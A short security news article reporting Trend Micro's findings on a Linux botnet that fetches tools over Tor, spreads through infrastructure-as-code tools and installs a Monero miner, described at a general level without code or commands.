Trend Micro Observed Malware Botnet Targeting Linux Systems


According to new research from anti-malware vendor Trend Micro, a recently discovered malware botnet targeting Linux systems is employing many of the evolving techniques among cyber-criminals, such as the use of Tor proxies, legal DevOps software, and the removal of competing malware.

According to the researchers, the malware can download all of the files it requires from the Tor anonymity network, including post-infection scripts and valid, necessary binaries such as ss, ps, and curl that may be missing from the setting.

The malware may use these tools to send HTTP requests, collect data about the infected device, and even run processes.

The threat actor behind the botnet operates a large network of proxies to establish links between the surface web and the Tor network in order to carry out the attacks.

Apart from translating requests, these proxies often submit information about the victim systems, such as IP addresses, architecture, usernames, and a portion of the uniform resource identifier (URI) to determine which architecture-dependent binary to download.

The abused proxy servers have insecure open services, implying that they were exploited without the server owner’s knowledge. Trend Micro’s researchers discovered that the proxy service was still disabled after a while during their investigation.

The Linux malware is designed to operate on a wide range of device architectures, with the initial script performing a series of checks on the target before downloading additional files and continuing the infection process.

As a result, Trend Micro suspects the threat actor behind the botnet is preparing to begin a larger campaign aimed at Linux systems.

The malware sample discovered can disable cloud-related resources and agents, as well as spread to other systems using infrastructure-as-code (IaC) tools like Ansible, Chef, and SaltStack.

Currently, the botnet instals the XMRig Monero (XMR) miner on compromised computers. The crypto-miner has its own mining pool, and the malware looks for other miners that are operating and tries to remove them.

“No other software is needed for this malware sample to run and spread; the Linux operating system is the only requirement. Since not every environment targeted for infection has them, and it’s possible that the consumer doesn’t have the requisite permissions to instal them on the device (as in the case of containers), it instals the essential tools (ss, ps, curl),” Trend Micro added.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.